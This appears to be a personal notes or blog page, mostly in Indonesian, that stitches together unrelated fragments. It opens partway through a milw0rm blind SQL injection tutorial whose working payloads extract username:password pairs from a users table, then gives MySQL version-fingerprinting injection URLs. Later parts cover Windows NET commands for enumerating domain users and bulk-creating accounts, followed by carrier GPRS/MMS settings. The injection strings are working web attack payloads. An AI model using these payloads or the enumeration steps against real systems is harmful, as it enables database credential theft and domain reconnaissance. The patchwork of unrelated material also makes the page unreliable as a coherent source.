
FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is ‘i’. We have ‘ci’ so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i’m doing everything manually,

cause that makes you better SQL INJECTOR 😀

Hope you learned something from this paper.

Have FUN! (:

To be continued and updated…

marezzi@gmail.com

[18 April 2008]

# milw0rm.com [2008-05-22]

—-

http://foo/web.php?table=38 – We get normal screen
http://foo/web.php?table=38/*%20s*/ – We get normal screen
http://foo/web.php?table=38/*!%20s*/ – We get a different screen because syntax error in comments – MySQL is in use
http://foo/web.php?table=38/*!30000%20s*/ – We get a different screen, MySQL is at least 3.x.x
http://foo/web.php?table=38/*!40000%20s*/ – We get a different screen, MySQL is at least 4.x.x
http://foo/web.php?table=38/*!50000%20s*/ – We get normal screen, MySQL is below 5.x.x
http://foo/web.php?table=38/*!40020%20s*/ – We get normal screen, MySQL is below 4.0.20
http://foo/web.php?table=38/*!40017%20s*/ – We get a different screen, MySQL is at least 4.0.17
http://foo/web.php?table=38/*!40018%20s*/ – We get normal screen, MySQL is below 4.0.18

From : milw0rm

Command prompt for logg networking

How can I create a report of all the users and groups in my domain?
=====================================================
Note:  Removal of the /domain switch will generate a report for the local machine.

NET USERS /DOMAIN >USERS.TXT

This command will return the user accounts from the Primary Domain Controller (PDC) of the current domain, and write them to a file called USER.TXT

NET ACCOUNTS /DOMAIN >ACCOUNTS.TXT

This command will return the account policy information from the PDC of the current domain, and write it to a file called ACCOUNTS.TXT

NET CONFIG SERVER >SERVER.TXT

This command will return the server name, version of Windows, active network adapter information/MAC address, Server hidden status, Maximum Logged On Users, Maximum open files per session, Idle session time, and assign it to a file called SERVER.TXT

NET CONFIG WORKSTATION >WKST.TXT

This command will return the workstation name, user name, version of Windows, network adapter, network adapter information/MAC address, Logon domain, COM Open Timeout, COM Send Count, COM Send Timout, and write it to a file called WKST.TXT.

NET GROUP /DOMAIN >DGRP.TXT

This command will return the global groups on the PDC of the current domain, and write them to a file called GRP.TXT.

NET LOCALGROUP >LGRP.TXT

This command will return the local groups on the local machine, and write them to a file call LGRP.TXT.

NET VIEW /DOMAIN:DOMAINNAME >VIEW.TXT

This command will return the resources in the specified domain, and write them to a file called VIEW.TXT.

Method #1: By using the NET USER command
====================================

NET USER is an old NT-related user manipulation command. I will not list all of it’s attributes here
(you can find for yourself by going to the Help and Support site on your computer). I do not usually use the
NET USER command in an AD environment, mostly due to the fact that it is not tailored for AD objects at all, but still, it can be used for our needs.

You can use the FOR and NET USER commands to accomplish the task in a “quick and dirty” way, without scripting or writing any code.
For example, if you type from the command prompt:
———
FOR /L %i in (1,1,500) DO NET USER MyUser%i /ADD
———
This will result in creating 500 new users, named MyUser1, MyUser2, etc. You can, of course, customize the FOR command’s parameters. See the FOR command help for more options.

You can also set the user’s password (in this case – P@ssw0rd) in the same manner:

FOR /L %i in (1,1,500) DO NET USER MyUser%i P@ssw0rd /ADD

You can delete all those users by running the following command:

FOR /L %i in (1,1,500) DO NET USER MyUser%i /DELETE

Note: If run on a stand alone W2K Server, W2K PRO or on an XP machine, this script will create local users. If run on a DC it will create users in the USERS Container in the AD. However, doing so on a domain controller will not create fully AD-compatible users (as you can clearly see if you open one of these users and try to find the User Principal Name – UPN – field).

Note: If you’re using a W2K PRO or XP PRO computer that is connected to an Active Directory network and you wish to create local users on that computer – run the command above. However, if you want, from that computer, to create users in the Active Directory database on the DC, use this command instead:

FOR /L %i in (1,1,500) DO NET USER MyUser%i P@ssw0rd /domain /ADD

To create users with pre-configured names (for example – a file with all your company’s usernames or a database with usernames) create a text file like this one:

daniel moshe yossy gabi ran bijo baruch bibi

Name the file USERS.TXT and place it in a directory.

Now open a CMD in that directory and run the following command:

FOR /F %i in (users.txt) DO NET USER %i P@ssw0rd /domain /ADD

This will create user accounts with the names found in the USERS.TXT file, all with the same password – P@ssw0rd. You don’t have to use the /domain switch unless you want to.

See the NET USER or NET USERS command help for more options.

Method #2: By using the NET command DOS
====================================

command line atau dos pada os windows,merupakan aplikasi yang sangat unik dan menarik.
kita dapat melakukan berbagai perintah dalam os dengan mengetikan perintah pada command line ini:

salah satu perintah yang dapat di akses lewat command line adalah perintah untuk configurasi
network/jaringan anda.
net.jpg
berikut adalah perintah dasarnya :

c:\net [opsi tambahan]

opsi-opsi yang tersedia :
accounts >> untuk mengatur account network, berikut yang dapat dikonfigurasi dalam opsi ini:
sytanx : c:\net accounts opsi : nilai/variabel
** force user log off how long after time expires
** minimum passoword age (days)
** maximum passowrd age (days)
** minimum password length
** length of password history maintained
** lockout threshold
** lockout duration (minute)
** lockout observation window (minute)
** computer role :

computer >> untuk menambah atau menghapus komputer dalam network
syntax : c:\net computer \\client01 /add
berikut adalah nilai yang dapat diubah dalam perintah ini :
** server name
** server comment
**

config >> berfungsi untuk mengatur konfigurasi server atau workstation
syntax : c:\net config server
berikut adalah configurasi dalam perintah config :
** server
** workstation

continue >> perintah ini untuk melanjutkan service yang berjalan.
syntax : c:\net continue service

file >> perintah ini untuk manajemen file sharing dalam network
syntax : c:\net file

group >> perintah untuk pengaturan group computer dan domain lewat WDC (windows domain controler)
sntax : c:\net group

help >> perintah ini untuk menampilkan menu help pada setiap opsi perintah net
syntax : c:\net help [opsi]

helpmsg >> perintah ini untuk menampilkan bantuan pada setiap nomer pesan error yang muncul
syntax : c:\net helpmsg [no.pesan,contoh 2185]

localgroup >> perintah untuk konfigurasi localgroup dalam network
syntax : c:\net localgroup [opsi]
berikut opsi yang tersedia dalam localgroup:
** administrators
** backup operators
** guests
** help service groups
** network configuration operators
** power users
** remote desktop users
** replicator
** users

name >> perintah untuk mengatur name alias yang bekerja pada messenger,
syntax : c:\net name

pause >> perintah untuk mempause suatu service atau resource yang berjalan dalam network.
syntax : c:\net pause service [nama service]
contoh nama service yang berjalan :
** net logon
** nt lm security support provider
** shedule
** server
** workstation

print >> perintah untuk menampilkan pekerjaan yang berjalan dalam komputer jaringan.
sytanx : c:\net print \\client01
opsi yang dapat dilakukan dalam perintah print adalah :
** \\computername : the name of the computer sharing the printer queue(s)
** sharename : name of the shared printer queue.
** job# : identification number assgined to a print.
** hold : prevents a job in a queue from printing.
** /release : reactivates a job that is held
** /delete : removes a job from a queue

send >> perintah untuk mengirimkan pesan pada user atau komputer lain dalam network.
syntax : c:\net send {nama : * : /domain[name] : /users } pesan

session >> perintah untuk menampilkan data sesi tiap2 komputer dalam network.
syntax : c:\net session \\client01 /delete
opsi dalam sesi ini adalah :
** \\namakomputer : nama komputer yang akan di cetak sesinya dalam network.
** /delelte : sesi terakhir yang terjadi dalam network.

share >> perintah ini berfungsi untuk menshare resource yang ada pada server agar dapat digunakan
dalam network.
syntax : c:\net share [sharename]
opsi yang tersedia dalam perintah net share :
** sharename
** drive:path
** /users:number
** /unlimited
** /remark:”teks”
** devicename
** /delete
** /cache:manual
** /cache:documents
** /cache:programs
** /cache:none

start >> perintah ini berfungsi untuk menampilkan dan menjalankan service pada server.
sytanx : c:\net start “service”
berikut adalah daftar bebearapa service yang dapat dilihat pada net start:
** application layer gateway service
** automatic updates
** COM+ event system
** computer browser
** cryptographic services
** DHCP client
** Distributed Link Tracking Client
** DNS client
** Error reporting Services
** Event log
** Help and support
** IIS admin
** Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
** IPSEC Services
** Logical Disk manager
** Mysql
** Network Connections
** Network Location Awareness (NLA)
** Remote Procedure Call (RPC)
** Simple Mail Transfer Protocol (SMTP)
** Security Accounts Manager
** TCP/IP netBios Helper
** Telephony
** Webclient
** Wireless zero configuration
** World Wide Publishing

statistics >> perintah ini untuk menampilkan log statistic pada jaringan lokal atau service server.
syntax : c:\net statistics [opsi]
berikut adalah opsi yang tersedia pada net statistics :
** server : menampilkan log statistic server
** workstation : menampilkan log statistic workstation

stop >> perintah ini berfungsi untuk menghentikan service yang berjalan dalam network.
syntax : c:\net stop [service]
berikut daftar beberapa service yang dapat distop dengan perintah net stop :
** alerter
** browser
** client service for netware
** clipbook
** DHCP client
** file replication
** messenger
** net logon
** NT LM security support provider
** remote accsess connection manager
** routing and remote access
** RPCLOCATOR
** Schedule
** server
** spooler
** TCP/IP NetBios helper service
** UPS
** workstation

time >> perintah ini berfungsi untuk mencocokan jam di komputer dengan komputer lain atau domain.
atau juga untuk menampilkan waktu pada komputer lain atau domain.
syntax : c:\net time [opsi]
berikut beberapa opsi yang ada pada net time :
** \\computername
** /domain:namadomain
** /RTSdomain:namadomain RTS=Reliable Time Server
** /set
** /querysntp
** /setsntp:ntp server list

use >> perintah ini berfungsi untuk menghubungkan atau memutuskan sebuah komputer ke sebuah resources yang
dishare dalam network
syntax : C:\net use [opsi]
beberapa opsi dalam perintah net use :
** devicename
** \\computername
** \sharename
** \volume
** password
** /user
** domainname
** username
** /smartcard
** /savecred
** /home
** /delete
** /persistent
** yes
** no

user >> perintah ini befungsi untuk membuat,mengubah,ataupun menghapus user dalam suatu workstation.
syntax : c:\net user [username[passowrd:*][option]] [/domain]

view >> perintah ini berfungsi untuk menampilkan daftar resource yang dishare dalam network.
syntax : c:\net view \\namakomputer /cache : /domain:namadomain
ket opsi cache : display the offline caching settings for the resources the specified computer.

by : Ujang #10j#

at 14 Dec 08, 1:58 pm

Dasar Setting Manual net via HP

AXIS

Parameter Setting Manual GPRS

Connection Name: AXIS
Data Bearer: GPRS (Paket Data) atau PS
APN: AXIS
Username: AXIS
Password: 123456
Authentication: Normal
Proxy Address: 10.8.3.8
Proxy Port: 9201 atau 8080
Homepage: http://wap.axisworld.co.id
Connection Security: Off
Session Mode: Permanent

Parameter Setting Manual MMS

Connection Name: AXISmms
Data Bearer: GPRS (Paket Data) atau PS
APN: AXISmms
Username: AXIS

Prompt Password: No
Password: 123456
Authentication: Normal
Proxy Address: 10.8.3.8
Proxy Port: 9201 atau 8080
Homepage: http://mmsc.axisworld.co.id
Connection Security: Off
Session Mode: Permanent

3 THREE

Parameter Setting Manual GPRS 3 Three

Profil Name: 3 GPRS
APN: 3gprs
Proxy Server Address: 10.4.0.10
Proxy Port Number: 3128
Data Bearer: GPRS (Paket Data)
Username: 3gprs
Password: 3gprs
Homepage: http://wap.three.co.id

Parameter Setting Manual MMS 3 Three

Profil Name: 3 MMS
APN: 3mms
Proxy Server Address: 10.4.0.10
Proxy Port Number: 3128
Data Bearer: GPRS (Paket Data)
Username: 3mms
Password: 3mms
Homepage: http://mms.three.co.id

MENTARI

Parameter Setting Manual GPRS Mentari

Profil Name: Indosat GPRS
APN: indosatgprs
Proxy Address: 10.19.19.19
Port Proxy: 8080
Data Bearer: GPRS (Paket Data)
Username: indosat
Password: indosat
Homepage: http://wap.klub-mentari.com

Contoh penerapan di Handphone

Parameter Setting Manual MMS Mentari

Profil Name: Indosat MMS
APN: indosatmms
Proxy Address: 10.19.19.19
Port Proxy: 8080
Data Bearer: GPRS (Paket Data)
Username: indosat
Password: indosat
Homepage: http://mmsc.indosat.com

Contoh penerapan di Handphone

IM3

Parameter Setting Manual GPRS IM3

Connection Name: M3-GPRS
APN: http://www.indosat-m3.net
Username: gprs
Password: im3
Proxy Address: 10.19.19.19
Proxy Port: 9201 atau 8081
Homepage: http://wap.m3-access.com

Contoh penerapan di Handphone

Parameter Setting Manual MMS IM3

Connection Name: M3-MMS
APN: mms.indosat-m3.net
Username: gprs
Password: im3
Proxy Address: 10.19.19.19
Proxy Port: 9201 atau 8081
Homepage: http://mmsc.m3-access.com

Contoh penerapan di Handphone

TELKOMSEL

Parameter Setting Manual GPRS Telkomsel

Profil Name: TSEL GPRS

Data Bearer: Packet Data
APN: telkomsel
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Gateway IP Address: 10.1.89.130

Proxy Serv. Address: 8000
Homepage: http://wap.telkomsel.com
Connection Security: Off
Session Mode: Permanent

Parameter Setting Manual MMS Telkomsel

Profil Name: TSEL- MMS

Data Bearer: Packet Data
APN: telkomsel
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Gateway IP Address: 10.1.89.130

Proxy Port Number: 8000
Homepage: http://mms.telkomsel.com
Connection Security: Off
Session Mode: Permanent

XL

Parameter Setting Manual GPRS XL

Profil Name= XL GPRS
APN: http://www.xlgprs.net
Username: xlgprs
Password: proxl
Proxy Server Address: 202.152.240.50
Proxy Port: 8080
Homepage: http://wap.lifeinhand.com
Data Bearer: GPRS (Paket Data)

Parameter Setting Manual MMS XL

Profil Name= XL MMS
APN: http://www.xlmms.net
Username: xlgprs
Promt Password: No
Password: proxl
Proxy Server Address: 202.152.240.50
Proxy Port Number: 8080
Homepage: http://mmc.xl.net.id/servlets/mms
Data Bearer: GPRS (Paket Data)
SETTING GPRS & MMS

PETUNJUK UMUM

1. Kecuali untuk kartu IM3, penyetingan GPRS atau MMS memerlukan proses aktivasi terlebih dahulu.
2. Proses aktivasi dilakukan dengan cara menghubungi operator yang bersangkutan sesuai kartu yang digunakan.
3. Mengenai cara melakukan aktivasi secara detil dapat dilihat pada detil penyetingan GPRS di bawah ini.
====================================================

– Setting GPRS Indosat, Xl dan Telkomsel –

*Setting GPRS Mentari via OTA (Over The Air) :
Ketik SMS: GPRS(spasi)MerkHP(spasi)TypeHP
Kirim Ke: 3000
Contoh: GPRS NOKIA 6600

*Setting GPRS Mentari Manual :
Profile Name : INDOSATGPRS
User name : indosat
Access Point Name (APN) : http://www.satelindogprs.com
Password : indosat
Gateway IP : 10.19.19.19
Homepage : http://wap.klub-mentari.com/
Data Bearer : GPRS
Proxy port number : 9201
Activate GPRS : ACTGPRS kirim ke 888
Call Center : (021) 5438 8888 atau 222 (dari handphone)
====================================================

*Setting GPRS Matrix via OTA :
Ketik SMS: GPRS(spasi)MerkHP(spasi)TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 6600
====================================================
*Setting GPRS MATRIX Manual :
User Name : dikosongkan
APN : http://www.satelindogprs.com
Password : dikosongkan
Gateway IP : 202.152.162.250
Homepage : http://wap.matrix-centro.com/
Data Bearer : GPRS
Proxy port number : 9201
Activate GPRS : ACTGPRS kirim ke 888
Call Center : (021) 5438 8888 atau 222 (dari handphone)

*Setting GPRS IM3 via OTA :
Ketik SMS: GPRS(spasi)MerkHP(spasi)TypeHP
Kirim Ke: 3939
Contoh: GPRS NOKIA 6600

*Setting GPRS Im3 Manual :
User name : gprs
APN : http://www.indosat-m3.net
Password : im3
Gateway IP : 010.019.019.019
Homepage : http://wap.m3-access.com/
Data Bearer : GPRS
Proxy port number : 9201 atau 8080
====================================================
*Setting GPRS XL via OTA :
Ketik SMS: GPRS(spasi)MerkHP(spasi)TypeHP
Kirim Ke: 9667
Contoh: GPRS NOKIA 6600

*Setting GPRS XL Manual :
User name : xlgprs
APN : http://www.xlgprs.net
Password : proxl
IP Address : 202.152.240.50
Homepage : http://wap.lifeinhand.com/
Data Bearer : GPRS
Port : 9201 (standard), 8080 (proxy)
Prompt Password : No
Authentication : Normal
Phone IP address : Automatic
Primary name server : 0.0.0.0
Secondary name server : 0.0.0.0

====================================================
*Setting GPRS SIMpati dan kartu AS via OTA :
Ketik SMS: GPRS(spasi)16 no ICCID
Kirim Ke: 6616
Contoh: GPRS 6210008811096665
Keterangan: ICCID (Integrated Circuit Card Identification) adalah nomor yang terdiri dari 16 (enam belas) digit nomor dan terdapat di belakang chip SIM Card kamu.

*Setting GPRS Katu HALO via OTA :
Ketik SMS: GPRS
Kirim Ke: 6616
Contoh: GPRS

*Setting GPRS Telkomsel (semua kartu) Manual :
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Prompt Password : No
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com/
Connection Security : Off
Session Mode : Permanent
====================================================
*Setting GPRS Three
Otomatis aktif pada pembelian kartu perdananya. Tunggu beberapa menit Setting GPRS/MMS OTA akan di kirim langsung ke HP anda (Gratis). Bila setting GPRS belum terkirim, pindahkan kartu anda ke HP yg support GPRS lainnya tunggu beberapa menit lalu pindahkan lagi ke HP anda.

*Setting MMS Telkomsel VIA OTA
– Kartu HALO:
Daftar di GRAPARI atau
Ketik SMS : MMS
Kirim ke : 6616

– Kartu SIMPATI:
Ketik SMS: MMS(spasi)16 nomor kartu dibelakang SIM card
Kirim ke: 6616
Contoh: MMS 6210008811096665

*Setting MMS Telkomsel Manual
Connection Name : tel-MMS
Data Bearer : GPRS
Access Point Name : mms
Username : wap
Prompt Password : No
Password : wap123
Authentication : Normal
Proxy address : 10.1.89.150
Homepage : http://mms.telkomsel.com/
Connection Security : Off
====================================================

Ketentuan-ketentuan Pengaktifan GPRS simPATI (Telkomsel)

1. Menggunakan ponsel dengan fasilitas GPRS.

2. Masih memiliki pulsa minimum Rp. 500,- dibawah nilai tersebut Anda tidak dapat menggunakan layanan GPRS, MMS maupun SMS.

3. Mendaftar sebagai pelanggan GPRS, yang hanya dapat dilakukan melalui SMS.
Caranya :
Ketik SMS : GPRS [Nomor Kartu]
Contoh : GPRS 6210008811096665
Kirim ke : 6616
Catatan : Tarif pesan kirim SMS : Rp. 350 ,- / pesan.
Nomor kartu merupakan nomor ICCID (Integrated Circuit Card Identification) yang terdiri dari 16 (enam belas) digit nomor dan terdapat di belakang chip kartu simPATI Anda. Isi pesan tidak tergantung pada huruf besar atau kecil (non case sensitive).
Dalam pengetikan nomor kartu tidak boleh ada spasi.

4. Sistem akan memberikan pesan notifikasi SMS kepada Anda setelah beberapa waktu untuk memberitahukan bahwa permintaan aktivasi sedang diproses : “Your request for GPRS Setup already received. Please wait for max. 48 hours for succesfull activation notification message.”

5. Pemrosesan aktivasi membutuhkan waktu maksimum 48 jam.

6. Setelah proses aktivasi sukses dilakukan, sistem akan memberitahukan kepada Anda melalui SMS dari 6616 : “Welcome to GPRS Service! Your GPRS service has been activated. Please visit http://www.telkomsel.com for more information”

7. Melakukan setting pada terminal komunikasi yang digunakan dengan parameter-parameter seperti penjelasan di atas

8. Berada di wilayah layanan GPRS.

9. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda telah terdaftar pada http://www.telkomsel.com.

10. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda melakukan setting handset untuk menggunakan Access Point Name (APN) telkomsel.

Ketentuan Pengaktifan GPRS kartuHalo (Telkomsel)

1. Menggunakan ponsel dengan fasilitas GPRS.

2. Mendaftar sebagai pelanggan GPRS, pendaftaran dapat dilakukan di GraPARI atau hubungi 111, layanan bebas pulsa dari kartuHALO Anda, atau dapat dilakukan melalui SMS
Caranya :
Ketik SMS : GPRS
Kirim ke : 6616

Catatan : Tarif pesan kirim SMS : Rp. 250 ,- / pesan.

3. Sistem akan memberikan pesan notifikasi SMS kepada Anda setelah beberapa waktu untuk memberitahukan bahwa permintaan aktivasi sedang diproses : “Your request for GPRS Setup already received. Please wait for max. 48 hours for succesfull activation notification message.”

4. Pemrosesan aktivasi membutuhkan waktu maksimum 48 jam.

5. Setelah proses aktivasi sukses dilakukan, sistem akan memberitahukan kepada Anda melalui SMS dari 6616 : “Welcome to GPRS Service! Your GPRS service has been activated. Please visit http://www.telkomsel.com for more information”

6. Melakukan setting pada terminal komunikasi yang digunakan dengan parameter-parameter seperti berikut :
User Name : wap
Prompt Password : No
Password : wap123
APN : Telkomsel
Data Bearer : GPRS
Authentication : Normal
Homepage : http://wap.telkomsel.com/
Gateway IP Address : 10.1.89.130
Port : 9201 (standard), 8000 (proxy)

7. Berada di wilayah layanan GPRS.

8. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda telah terdaftar pada http://www.telkomsel.com.

9. Untuk menggunakan WAP Telkomsel dengan GPRS, pastikan Anda melakukan setting sesuai dengan parameter-parameter yang telah dijelaskan.

Ketentuan Pengaktifan GPRS XL
Setting GPRS/MMS Secara Otomatis Kirimkan SMS berikut ke 9667, biaya Rp. 350,- (sudah termasuk PPN untuk pengguna bebas dan belum termasuk PPN untuk pengguna Xplor).
Untuk aktivasi GPRS/MMS di sistem, hubungi Customer Service XL di 818 melalui nomor bebas/Xplor Anda (bebas pulsa) atau 021 57959818 melalui nomor lainnya (dikenakan tarif sesuai dengan yang berlaku).

====================================================
Aktivasi 3G

Untuk Telkomsel (kartuHALO, simPATI dan kartuAs)
Pengaktifan
Ketik SMS : 3G
Kirim ke : 3636

Ketentuan :
-Menggunakan Handphone 3G.
-Menggunakan Jaringan Telkomsel.
-Berada pada Cakupan Jaringan (Network Coverage) 3G Telkomsel.
-Khusus untuk Mobile Video (Video Streaming & Video Download) Handset harus disetting , dengan cara :
kirim SMS : S(spasi)MERK(spasi)TYPE ke 5432
misalnya : S NOKIA N73

Untuk INDOSAT
Pengaktifan
Ketik SMS : Reg(spasi)3G
Kirim ke : 777

Ketentuan :
-Menggunakan Handphone 3G.
-Menggunakan Jaringan Indosat.
-Berada pada Cakupan Jaringan (Network Coverage) 3G Indosat

====================================================
Setting Axis

GPRS, 3G/HSDPA

1. Access point name (APN) : axis
2. User name : axis
3. Password : 123456
4. Phone IP Address : Automatic
5. Proxy Server Address : 10.8.3.8 atau 10.8.1.8
6. Proxy port number : 8080 atau 9201
7. Home : wap.axisworld.co.id

MMS

1. Access point name : axismms
2. User name : axis
3. Prompt Password : No
4. Password : 123456
5. Authentication : Normal
6. Gateway IP address : 0.0.0.0
7. Proxy server address : 10.8.3.8 atau 10.8.1.8
8. Proxy port number : 8080 atau 9201
9. Homepage : mmsc.axis

====================================================

Ujang, 11:04 am (w2 – warung wifi)#10j#